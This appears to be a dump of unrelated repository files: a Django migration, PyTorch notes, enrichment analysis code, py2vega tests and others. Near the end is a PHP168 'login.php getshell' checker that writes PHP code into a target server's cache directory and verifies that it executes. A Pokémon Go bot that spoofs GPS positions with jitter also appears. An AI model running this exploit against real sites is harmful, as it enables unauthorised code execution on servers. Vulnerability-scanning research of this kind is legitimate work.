1cb30c9e269871d07348485c6437fce3c01a5415 | c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce | /flask/flaskenv/Lib/site-packages/pip/_vendor/msgpack/fallback.py | dd93d22d4040925980e877b62a2e0b299673c4bd | [] | no_license | AhsonAslam/webapi | 54cf7466aac4685da1105f9fb84c686e38f92121 | 1b2bfa4614e7afdc57c9210b0674506ea70b20b5 | refs/heads/master | 2020-07-27T06:05:36.057953 | 2019-09-17T06:35:33 | 2019-09-17T06:35:33 | 208,895,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:f85297381085e0252cf5010ea8096cb08f88640d230516b6ed589e1429e0302e
size 37491
| [
"github@cuba12345"
] | github@cuba12345 |
b2fb7e9429aba97f24de724038516d82b01d2628 | c35b1d9dd99c7b0ad3e8bee3293df7042f9ae39a | /flatpages_plus/migrations/0006_auto__add_field_flatpage_photo.py | aafdf685ac68e4d45ca808587c1bf1d9451669dc | [
"MIT"
] | permissive | grengojbo/django-flatpages-plus | 467b2e82d3f2d3c71629ddab5288e1416e5ddeda | 29af987565dd4c87fa3b0751105b5521e2690374 | refs/heads/master | 2020-12-24T20:42:23.064557 | 2014-03-02T17:29:22 | 2014-03-02T17:29:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,533 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'FlatPage.photo'
db.add_column('flatpages_plus_flatpage', 'photo',
self.gf('sorl.thumbnail.fields.ImageField')(max_length=255, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'FlatPage.photo'
db.delete_column('flatpages_plus_flatpage', 'photo')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'flatpages_plus.categories': {
'Meta': {'object_name': 'Categories'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
'flatpages_plus.flatpage': {
'Meta': {'ordering': "('url',)", 'object_name': 'FlatPage'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['flatpages_plus.Categories']", 'null': 'True', 'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'enable_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'enable_social': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "u'unamed'", 'max_length': '80'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': "orm['auth.User']"}),
'photo': ('sorl.thumbnail.fields.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'registration_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'default': '[1]', 'to': "orm['sites.Site']", 'symmetrical': 'False'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'p'", 'max_length': '1'}),
'template_name': ('django.db.models.fields.CharField', [], {'max_length': '70', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '150', 'db_index': 'True'}),
'views': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'taggit.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"})
}
}
complete_apps = ['flatpages_plus'] | [
"[email protected]"
] | |
af5d7b1d518ffbf1091fa797c5bab04d0ceafc39 | 5b5eb61c02a1ee6632036a31108d5c962d474d2e | /00/pytorch.py | bae78442e40b561cf168d0df6d691ad703c08406 | [] | no_license | seven320/deeplearning | 73c76fa5e006a9164ed11fe9538b4975c0bdc161 | 56300e450caf390b4f953a9c882a9b4701ccb971 | refs/heads/master | 2021-04-26T22:27:47.019462 | 2018-11-06T02:09:04 | 2018-11-06T02:09:04 | 124,096,522 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,648 | py |
# coding: utf-8
# pytorch とは?
# https://pytorch.org/tutorials/beginner/blitz/tensor_tutorial.html#sphx-glr-beginner-blitz-tensor-tutorial-py
# In[ ]:
from __future__ import print_function
import torch
x = torch.empty(5, 3)
print(x)
# ランダム初期設定行列(randomly initialized matrix)
# In[7]:
x = torch.rand(5,3)
print(x)
# In[ ]:
0初期設定の行列
# In[8]:
x = torch.zeros(5, 3, dtype=torch.long)
print(x)
# 実際の値からの行列
# In[9]:
x = torch.tensor([5.5, 3])
print(x)
# In[11]:
x = x.new_ones(5, 3, dtype=torch.double)
print(x)
x = torch.randn_like(x, dtype=torch.float)
print(x)
# In[14]:
print(x.size())
# In[25]:
# x = x.new_ones(5, 3, dtype=torch.double)
x = torch.randn_like(x, dtype=torch.float)
y = torch.rand(5,3)
print(x + y)
# print(x + y)
# In[26]:
print(torch.add(x, y))
# In[29]:
result = torch.empty(5,3)
torch.add(x, y, out=result)
print(result)
# In[30]:
y.add_(x)
print(y)
# In[32]:
print(x)
print(x[:, 1])
# In[36]:
x = torch.randn(4,4)
y = x.view(8,2)
z = x.view(-1, 8)
print(x.size(),y.size(),z.size())
# In[38]:
x = torch.randn(1)
print(x)
print(x.item())
# In[40]:
a = torch.ones(5)
print(a)
# In[47]:
import numpy as np
b = a.numpy()
print(b)
c = np.copy(a.numpy())
print(c)
# In[42]:
a.add_(1)
print(a)
print(b)
# In[49]:
a = np.ones(5)
b = torch.from_numpy(a)
print(a,b)
np.add(a, 1, out=a)
print(a,b)
# In[50]:
if torch.cuda.is_available():
device = torch.device("cuda")
y = torch.ones_like(x, device=device)
x = x.to(device)
z = x + y
print(z)
print(z.to("cpu", torch.double))
| [
"[email protected]"
] | |
4a70189f56b7c999e46df08262eb3ac37e231c87 | 77871bb4c5f4714a19c33ad804a20c94bcdacc7e | /Interfaces/AI/Stepper/Pokestopper.py | abd44d28f5e7de1647e7ca9a35e479c9fd8da45b | [] | no_license | MaxOnNet/PokeStats | 58165f449acf3fc5b14e4f3a63a783f947df3eb8 | 3eb5aa2d13833b1d2299023f4d6f88348bae3bd6 | refs/heads/master | 2021-01-20T20:28:56.999545 | 2016-08-24T08:06:41 | 2016-08-24T08:06:41 | 63,936,162 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,961 | py | # -*- coding: utf-8 -*-
import logging
import random
from math import ceil
from sqlalchemy import text as sql_text
from Interfaces.MySQL.Schema import Pokestop, parse_map_cell
from Interfaces.AI.Human import sleep, random_lat_long_delta, action_delay
from Interfaces.AI.Stepper.Normal import Normal
from Interfaces.AI.Worker.Utils import format_time, distance
from Interfaces.pgoapi.utilities import f2i, h2f, get_cell_ids
log = logging.getLogger(__name__)
class Pokestopper(Normal):
def inicialise(self):
log.info('Точечное сканирование P\S, переопределяем переменные БД')
self.scanner.mode.step = 0.0015
self.scanner.mode.walk = 6
self.scanner.mode.is_catch = False
self.scanner.mode.is_farm = True
self.scanner.mode.is_lookup = False
self.scanner.mode.is_defender = False
def take_step(self):
position = [self.origin_lat, self.origin_lon, 0]
coords = self.generate_coords(self.origin_lat, self.origin_lon, self.step, self.distance)
self.metrica.take_position(position, self.geolocation.get_google_polilyne(coords))
self.api.set_position(*position)
step = 1
for coord in coords:
self.metrica.take_status(scanner_msg='Point P\S ({} / {})'.format(step, len(coords)))
log.info('Точечное сканирование P\S ({} / {})'.format(step, len(coords)))
position = (coord['lat'], coord['lng'], 0)
if self.walk > 0:
self._walk_to(self.walk, *position)
else:
self.api.set_position(*position)
self.ai.heartbeat()
self._work_at_position(position[0], position[1], position[2], seen_pokemon=False, seen_pokestop=True, seen_gym=False, data=coord['id'])
action_delay(self.ai.delay_action_min, self.ai.delay_action_max)
step += 1
def _walk_to(self, speed, lat, lng, alt):
dist = distance(self.api._position_lat, self.api._position_lng, lat, lng)
steps = (dist + 0.0) / (speed + 0.0) # may be rational number
intSteps = int(steps)
residuum = steps - intSteps
log.info('Бежим из ' + str((self.api._position_lat, self.api._position_lng)) + " в " + str(str((lat, lng))) +
" на " + str(round(dist, 2)) + " по прямой. " + str(format_time(ceil(steps))))
if steps != 0:
dLat = (lat - self.api._position_lat) / steps
dLng = (lng - self.api._position_lng) / steps
for i in range(intSteps):
cLat = self.api._position_lat + dLat + random_lat_long_delta()
cLng = self.api._position_lng + dLng + random_lat_long_delta()
self.api.set_position(cLat, cLng, alt)
self.ai.heartbeat()
action_delay(self.ai.delay_action_min, self.ai.delay_action_max)
self.api.set_position(lat, lng, alt)
self.ai.heartbeat()
def _work_at_position(self, lat, lng, alt, seen_pokemon=False, seen_pokestop=False, seen_gym=False, data=None):
if data is not None:
pokestop = self.session.query(Pokestop).get(data)
cell = {
'forts': [
{
'id': pokestop.id,
'type': 1,
'latitude': pokestop.latitude,
'longitude': pokestop.longitude
}
]
}
self.metrica.take_search({'pokestops': 1})
self.api.set_position(lat, lng, alt)
self.ai.work_on_cell(cell, (lat, lng, alt), seen_pokemon=False, seen_pokestop=True, seen_gym=False)
position = (lat, lng, alt)
cellid = get_cell_ids(lat, lng)
timestamp = [0, ] * len(cellid)
map_cells = list()
sleep(self.ai.delay_scan)
response_dict = self.api.get_map_objects(latitude=f2i(lat), longitude=f2i(lng), since_timestamp_ms=timestamp, cell_id=cellid)
self.search.search(lat, lng)
if response_dict and 'status_code' in response_dict:
if response_dict['status_code'] is 1:
if 'responses' in response_dict:
if 'GET_MAP_OBJECTS' in response_dict['responses']:
if 'status' in response_dict['responses']['GET_MAP_OBJECTS']:
if response_dict['responses']['GET_MAP_OBJECTS']['status'] is 1:
map_cells = response_dict['responses']['GET_MAP_OBJECTS']['map_cells']
# Update current scanner location
self.metrica.take_position(position)
map_cells.sort(key=lambda x: distance(lat, lng, x['forts'][0]['latitude'], x['forts'][0]['longitude']) if 'forts' in x and x['forts'] != [] else 1e6)
log.debug("Получена информация о карте в размере {0} ячеек".format(len(map_cells)))
for cell in map_cells:
self.metrica.take_search(parse_map_cell(cell, self.session))
else:
log.warning("Получен неверный статус: {0}".format(response_dict['responses']['GET_MAP_OBJECTS']['status']))
else:
log.warning("Получен неверный статус: {0}".format(response_dict['status_code']))
self.api.set_position(lat, lng, alt)
for cell in map_cells:
self.ai.work_on_cell(cell, position, seen_pokemon=seen_pokemon, seen_pokestop=seen_pokestop, seen_gym=seen_gym)
def generate_coords(self, latitude, longitude, step_size, distance):
sql = """
SELECT
id as "pokestop_id",
latitude as "pokestop_latitude",
longitude as "pokestop_longitude",
(
6371 * acos (
cos ( radians({0}) )
* cos( radians( latitude ) )
* cos( radians( longitude ) - radians({1}) )
+ sin ( radians({2}) )
* sin( radians( latitude ) )
) * 1000
) AS "pokestop_distance"
FROM pokestop
HAVING pokestop_distance < {3}
ORDER BY pokestop_distance
""".format(latitude, longitude, latitude, distance)
coords = []
for pokestop in self.session.execute(sql_text(sql)):
lat = pokestop[1] + random_lat_long_delta()
lng = pokestop[2] + random_lat_long_delta()
coords.append({'lat': lat, 'lng': lng, 'id': pokestop[0]})
return coords | [
"[email protected]"
] | |
72d83f61ea7278de06a9f45c110a3ffba2430063 | 163808746e51d378f69a966645b8bb8a855b4625 | /MyMain1012/MyMain1012/mislHrf.py | 860d28ba23c0e7b4b51f525d9b16734181920a56 | [] | no_license | 0024thiroshi/comm5.0_fall_semester | 02b26b506b759dd7b18b963295a8908cb4a78245 | db350599b7085e56fbf2c316e74cd7a5b48f02b8 | refs/heads/main | 2023-02-12T13:07:34.080809 | 2021-01-13T06:03:04 | 2021-01-13T06:03:04 | 329,202,576 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 895 | py | import scipy
import numpy as np
from math import exp
import pandas as pd
import scipy.stats as sps
import matplotlib.pyplot as plt
import math
def hrf(nt,
peak_delay=6,
under_delay=10,
p_u_ratio = 6,):#nt:時間間隔
t = np.arange(0,30+nt,nt)
peak_disp=1
under_disp=1
normalize=True
hrf = np.zeros(t.shape, dtype=np.float)
pos_t = t[t > 0]
peak = sps.gamma.pdf(pos_t,
peak_delay/peak_disp,
loc=0,
scale=peak_disp)
UD = under_delay + peak_delay
undershoot = sps.gamma.pdf(pos_t,
UD / under_disp,
loc=0,
scale=under_disp)
hrf = peak - undershoot / p_u_ratio
if not normalize:
return hrf
return hrf / np.max(hrf)
| [
"“[email protected]”"
] | |
b2eb613a9162290732d40c2631fdb47d3cb98dbf | af3ec207381de315f4cb6dddba727d16d42d6c57 | /dialogue-engine/src/programy/storage/stores/sql/dao/link.py | f6447200627f0fc643988dcc8badf78e7d13dab7 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | mcf-yuichi/cotoba-agent-oss | 02a5554fe81ce21517f33229101013b6487f5404 | ce60833915f484c4cbdc54b4b8222d64be4b6c0d | refs/heads/master | 2023-01-12T20:07:34.364188 | 2020-11-11T00:55:16 | 2020-11-11T00:55:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,960 | py | """
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
"""
Copyright (c) 2016-2019 Keith Sterling http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from sqlalchemy import Column, Integer, String, Boolean, DateTime
from programy.storage.stores.sql.base import Base
from programy.storage.stores.utils import DAOUtils
class Link(Base):
__tablename__ = 'links'
id = Column(Integer, primary_key=True)
primary_user = Column(String(16))
generated_key = Column(String(256))
provided_key = Column(String(256))
expired = Column(Boolean)
expires = Column(DateTime)
retry_count = Column(Integer)
def __repr__(self):
return "<Linked(id='%s', primary_user='%s', provided_key='%s', generated_key='%s', expired='%s', expires='%s', retry_count='%d')>" % \
(DAOUtils.valid_id(self.id), self.primary_user, self.provided_key, self.generated_key, self.expired, self.expires, self.retry_count)
| [
"[email protected]"
] | |
e7e44f6c501f1455b389ef57e85fc9f635efc6a2 | b0ddd37a614556785b2ecd3d408357fd010ed72f | /test/test_py2vega.py | 61017752de6e06bfb281d05b43ba4bed2c5c5854 | [
"BSD-3-Clause"
] | permissive | codeaudit/py2vega | 837c9b347f4968956656fcfbc15b2d69110e267f | a3a94bf7e29414a649b796e3202a5621befadbb3 | refs/heads/master | 2020-07-07T13:06:04.690110 | 2019-08-20T08:49:12 | 2019-08-20T08:49:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,294 | py | import pytest
from py2vega import py2vega
from py2vega.functions.math import isNaN
whitelist = ['value', 'x', 'y', 'height', 'width', 'row', 'column']
def test_nameconstant():
code = 'False'
assert py2vega(code, whitelist) == 'false'
code = 'True'
assert py2vega(code, whitelist) == 'true'
code = 'None'
assert py2vega(code, whitelist) == 'null'
def test_num():
code = '36'
assert py2vega(code, whitelist) == '36'
def test_str():
code = '\'white\''
assert py2vega(code, whitelist) == '\'white\''
def test_tuple():
code = '(True, 3, \'hello\')'
assert py2vega(code, whitelist) == '[true, 3, \'hello\']'
code = '((True, 3, \'hello\'), 3)'
assert py2vega(code, whitelist) == '[[true, 3, \'hello\'], 3]'
def test_list():
code = '[True, 3, \'hello\']'
assert py2vega(code, whitelist) == '[true, 3, \'hello\']'
def test_dict():
code = '{\'hello\': 3, \'there\': 4}'
assert py2vega(code, whitelist) == '{\'hello\': 3, \'there\': 4}'
code = '{\'hello\': 3, \'there\': 4}'
assert py2vega(code, whitelist) == '{\'hello\': 3, \'there\': 4}'
def test_unary():
code = 'not value'
assert py2vega(code, whitelist) == '!(value)'
code = '-value'
assert py2vega(code, whitelist) == '-value'
code = '+value'
assert py2vega(code, whitelist) == '+value'
def test_binary():
code = 'value or 3'
assert py2vega(code, whitelist) == 'value || 3'
code = 'value and 3'
assert py2vega(code, whitelist) == 'value && 3'
code = 'value + 3'
assert py2vega(code, whitelist) == 'value + 3'
code = 'value**3'
assert py2vega(code, whitelist) == 'pow(value, 3)'
def test_ternary():
code = '3 if value else 4'
assert py2vega(code, whitelist) == 'value ? 3 : 4'
def test_compare():
code = '3 < value <= 4'
assert py2vega(code, whitelist) == '3 < value <= 4'
code = 'value in (\'ford\', \'chevrolet\')'
assert py2vega(code, whitelist) == 'indexof([\'ford\', \'chevrolet\'], value) != -1'
code = '\'chevrolet\' in value'
assert py2vega(code, whitelist) == 'indexof(value, \'chevrolet\') != -1'
code = '\'chevrolet\' not in value'
assert py2vega(code, whitelist) == 'indexof(value, \'chevrolet\') == -1'
def foo(value):
return 'red' if value < 150 else 'green'
def test_function():
assert py2vega(foo, whitelist) == 'value < 150 ? \'red\' : \'green\''
def test_whitelist():
with pytest.raises(NameError):
py2vega('my_variable')
assert py2vega('my_variable', ['my_variable']) == 'my_variable'
# Vega constants are accessible by default
assert py2vega('PI') == 'PI'
def bar():
return isNaN(3)
def test_math():
assert py2vega(bar) == 'isNaN(3)'
def invalid_func1():
print(3)
def test_invalid1():
with pytest.raises(RuntimeError):
py2vega(invalid_func1)
def test_invalid2():
with pytest.raises(RuntimeError):
py2vega(lambda value: value)
def conditional_func(value):
if value < 3:
return 'red'
elif value < 5:
return 'green'
else:
return 'yellow'
def test_if_stmt():
assert py2vega(conditional_func, whitelist) == "if(value < 3, 'red', if(value < 5, 'green', 'yellow'))"
def assign_func1(value):
val = ('USA', 'Japan')
return 'red' if value in val else 'green'
def assign_func2(value):
a = 'green'
b = 'red'
return a if value < 3 else b
def assign_func3(value):
a = 'green'
a = 'red'
return a
def assign_func4(value):
a = 'green'
b = a
return b
def assign_func5(value):
a = b = 'Hello'
return (a, b)
def assign_func6(value):
a = 'Hello'
b = a
a = 'World'
return b
def test_assign1():
assert py2vega(assign_func1, whitelist) == "indexof(['USA', 'Japan'], value) != -1 ? 'red' : 'green'"
def test_assign2():
assert py2vega(assign_func2, whitelist) == "value < 3 ? 'green' : 'red'"
def test_assign3():
assert py2vega(assign_func3, whitelist) == "'red'"
def test_assign4():
assert py2vega(assign_func4, whitelist) == "'green'"
def test_assign5():
assert py2vega(assign_func5, whitelist) == "['Hello', 'Hello']"
def test_assign6():
assert py2vega(assign_func6, whitelist) == "'Hello'"
| [
"[email protected]"
] | |
d771baddfaa09a4c3db22756b3f490f38382cbf3 | afada51a34ebc932fc9ca824ecf56aae04e3d74b | /lib/enrichment_modules.py | b74c4fce6db72594a14b0b79acb4fe6ac996284c | [] | no_license | SkBlaz/CBSSD | 0ec8c7e3fc2765d4897b650f584e97afabf7c4f6 | 3043a76c7065fa0f13770f38d3b7b3f661a9f117 | refs/heads/master | 2021-01-01T19:53:21.190536 | 2019-02-01T06:31:23 | 2019-02-01T06:31:23 | 98,710,089 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,931 | py | ##### this pyton code enables enrichment calculation from graph results from previous step
## this is to calculate enrichment scores
from scipy.stats import fisher_exact
import multiprocessing as mp
import random
from statsmodels.sandbox.stats.multicomp import multipletests
from collections import defaultdict, Counter
from .parsers import parse_gaf_file,read_termlist,read_topology_mappings,read_uniprot_GO
import pandas as pd
def calculate_pval(term):
# _partition_name,_partition_entries,term,_map_term_database,_number_of_all_annotated
## this calculates p value
#print(component, term_dataset, term, count_all)
query_term = term[0]
query_term_count_population = term[1]
inside_local = 0
outside_local = 0
for x in _partition_entries:
terms = _map_term_database[x]
if query_term in terms:
inside_local+=1
else:
outside_local+=1
query_counts = [inside_local, query_term_count_population]
pop_counts = [outside_local, _number_of_all_annotated-query_term_count_population]
p_value = fisher_exact([query_counts,pop_counts])[1]
return p_value
def multiple_test_correction(input_dataset):
from statsmodels.sandbox.stats.multicomp import multipletests
pvals = defaultdict(list)
with open(input_dataset) as ods:
for line in ods:
try:
component, term, pval = line.split()
pvals[component].append((term,pval))
except:
pass
print ("Component_by_size PFAM_term pvalue")
for key, values in pvals.items():
tmpP = [float(val[1]) for val in values]
termN = [val[0] for val in values]
significant, pvals, sidak, bonf = multipletests(tmpP,method="hs",is_sorted=False,returnsorted=False)
## Holm Sidak
output = zip(termN,significant,pvals,tmpP)
for term,significant,pval,tmp in output:
if (significant == True):
print (key,term,significant,tmp,pval)
def parallel_enrichment(term):
pval = calculate_pval(_term_database[term])
return {'observation' : _partition_name,'term' : _term_database[term][0],'pval' : pval}
def compute_enrichment(term_dataset, term_database, topology_map, all_counts, whole_term_list=False):
if whole_term_list:
tvals = set.union(*[x for x in topology_map.values()])
topology_map = {}
topology_map['1_community'] = tvals
global _partition_name
global _partition_entries
global _term_database
global _map_term_database
global _number_of_all_annotated
_number_of_all_annotated = all_counts
_term_database = {en : x for en, x in enumerate(term_database.items())} ## database of all annotations
_map_term_database = term_dataset ## entry to acc mappings
finalFrame = pd.DataFrame()
for k, v in topology_map.items():
print("Computing enrichment for partition {}".format(k))
## reassign for parallel usage
_partition_name = k
_partition_entries = v
## computational pool instantiation
ncpu = 2 #mp.cpu_count()
pool = mp.Pool(ncpu)
## compute the results
n = len(term_database)
step = ncpu ## number of parallel processes
jobs = [range(n)[i:i + step] for i in range(0, n, step)] ## generate jobs
## result container
tmpframe = pd.DataFrame(columns=['observation','term','pval'])
results = [parallel_enrichment(x) for x in range(n)]
# for batch in jobs:
# results = pool.map(parallel_enrichment,batch)
tmpframe = tmpframe.append(results,ignore_index=True)
## multitest corrections on partition level
significant, p_adjusted, sidak, bonf = multipletests(tmpframe['pval'],method="fdr_bh",is_sorted=False, returnsorted=False, alpha=0.05)
tmpframe['corrected_pval_fdr_bh'] = pd.Series(p_adjusted)
tmpframe['significant'] = pd.Series(significant)
tmpframe = tmpframe[tmpframe['significant'] == True]
finalFrame = finalFrame.append(tmpframe,ignore_index=True)
return finalFrame
if __name__ == "__main__":
print("Starting enrichment analysis..")
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--filename",default="./test.txt")
parser.add_argument("--filename_mappings",default="./test.txt")
args = parser.parse_args()
## 1.) read the database.
term_dataset, term_database, all_counts = read_uniprot_GO(args.filename)
## 2.) partition function dict.
topology_map = read_topology_mappings(args.filename_mappings)
## 3.) calculate p-vals.
significant_results = compute_enrichment(term_dataset, term_database, topology_map, all_counts,whole_term_list=False)
significant_results.to_csv("../example_outputs/term_examples.txt",sep=" ",header=False)
| [
"[email protected]"
] | |
3e01df71c43a92672a6b4387ffcd0d505ed0ef01 | 6c219c027c7d0ef454bdeac196bd773e8b95d602 | /cms/php168/php168_login_getshell.py | 08224eb0012c6eed6e10a98c7606dfd32c336bc4 | [] | no_license | aStrowxyu/pocscan | 663f3a3458140e1bce7b4dc3702c6014a4c9ac92 | 08c7e7454c6b7c601bc54c21172c4788312603b1 | refs/heads/master | 2020-04-19T10:00:56.569105 | 2019-01-29T09:31:31 | 2019-01-29T09:31:31 | 168,127,418 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,581 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: PHP168 login.php GETSHELL漏洞
referer: http://wooyun.org/bugs/wooyun-2014-050515
author: Lucifer
description: Powered by php168 v6或者一下版本v5、v4、v3、v2、v1会搜索到很多很多相关的网站,login.php文件可以把代码写入cache目录中。
'''
import sys
import requests
import warnings
from termcolor import cprint
class php168_login_getshell_BaseVerify():
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/login.php?makehtml=1&chdb[htmlname]=404.php&chdb[path]=cache&content=<?php%20echo%20md5(1234);?>"
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
verifyurl = self.url + "/cache/404.php"
req2 = requests.get(verifyurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text:
cprint("[+]存在PHP168 GETSHELL漏洞...(高危)\tpayload: "+verifyurl, "red")
else:
cprint("[-]不存在php168_login_getshell漏洞", "white", "on_grey")
except:
cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = php168_login_getshell_BaseVerify(sys.argv[1])
testVuln.run() | [
